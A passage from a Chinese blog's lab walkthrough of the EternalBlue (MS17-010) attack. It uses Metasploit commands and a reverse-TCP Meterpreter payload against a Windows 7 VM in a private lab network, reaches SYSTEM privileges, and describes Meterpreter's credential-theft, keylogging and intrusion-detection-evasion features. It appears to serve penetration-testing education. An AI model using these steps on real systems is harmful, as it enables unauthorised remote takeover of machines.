alt="YJebLj.png"></p><p>根据结果,存在该漏洞。</p><ol start="4"><li>渗透攻击</li></ol><p>使用渗透攻击(exploit)模块;</p><ul><li>设置攻击目标地址+端口、本机地址</li></ul><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">use exploit/windows/smb/ms17_010_eternalblue</span><br></pre></td></tr></table></figure><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">set</span> rhost 192.168.40.142</span><br><span class="line"><span class="built_in">set</span> rport 445</span><br><span class="line"><span class="built_in">set</span> lhost 192.168.40.128</span><br></pre></td></tr></table></figure><p><img src="https://s1.ax1x.com/2020/05/11/YJeHyQ.png" alt="YJeHyQ.png"></p><ul><li>设置payload</li></ul><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">set</span> payload windows/x64/meterpreter/reverse_tcp</span><br></pre></td></tr></table></figure><p><img src="https://s1.ax1x.com/2020/05/11/YJeTSS.png" alt="YJeTSS.png"></p><ul><li>查看配置完整性</li></ul><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">show options</span><br></pre></td></tr></table></figure><p><img src="https://s1.ax1x.com/2020/05/11/YJezWT.png" alt="YJezWT.png"></p><p>在Exploit targets中可看到win7和server 2008 r2都适用;</p><ul><li>攻击</li></ul><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">run</span><br></pre></td></tr></table></figure><p><img src="https://s1.ax1x.com/2020/05/11/YJe7Qg.png" alt="YJe7Qg.png"></p><p>可以看到,直接得到了靶机system权限,并给出了<strong>shell</strong>界面。</p><p>+++</p><p>再回头看看我们的payload:</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">set</span> payload windows/x64/meterpreter/reverse_tcp</span><br></pre></td></tr></table></figure><p>目的是进入<strong>meterpreter</strong>模式,但是结果并不是这样。检查配置后,发现原因:</p><blockquote><p>Metasploit中的扫描器和大部分的其他辅助模块使用RHOSTS选项而不是RHOST</p></blockquote><p>将配置部分中<code>rhost</code>改为<code>rhosts</code>,开始攻击成功进入<strong>meterpreter</strong>模式:</p><p><img src="https://s1.ax1x.com/2020/05/11/YJevF0.png" alt="YJevF0.png"></p><p>+++</p><ol start="5"><li>查看此用户权限</li></ol><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">meterpreter > getuid</span><br></pre></td></tr></table></figure><p><img src="https://s1.ax1x.com/2020/05/11/YJeLes.png" alt="YJeLes.png"></p><p>如图,已经获得<code>NT AUTHORITY\SYSTEM</code>权限。</p><p>+++</p><blockquote><p><strong>Meterpreter</strong>: </p><p>Meterpreter是Metasploit框架中的一个扩展模块,作为溢出成功以后的攻击载荷使用,攻击载荷在溢出攻击成功以后给我们返回一个控制通道。使用它作为攻击载荷能够获得目标系统的一个Meterpreter shell的链接。Meterpreter shell作为渗透模块有很多有用的功能,比如添加一个用户、隐藏一些东西、打开shell、得到用户密码、上传下载远程主机的文件、运行cmd.exe、捕捉屏幕、得到远程控制权、捕获按键信息、清除应用程序、显示远程主机的系统信息、显示远程机器的网络接口和IP地址等信息。另外Meterpreter能够躲避入侵检测系统。在远程主机上隐藏自己,它不改变系统硬盘中的文件,因此HIDS[基于主机的入侵检测系统]很难对它做出响应。此外它在运行的时候系统时间是变化的,所以跟踪它或者终止它对于一个有经验的人也会变得非常困难。</p></blockquote><p>+++</p>]]></content>
<summary type="html">
<p><strong>实验环境:</strong></p>
<p>攻击机:Kali(192.168.40.128)</p>
<p>靶机:Win7(192.168.40.142)</p>
<p>+++</p>
<p><strong>攻击过程:</strong></p>
<ol>
<
</summary>
<category term="Demo" scheme="https://singlemindedt.github.io/tags/Demo/"/>
<category term="渗透" scheme="https://singlemindedt.github.io/tags/%E6%B8%97%E9%80%8F/"/>
</entry>
</feed>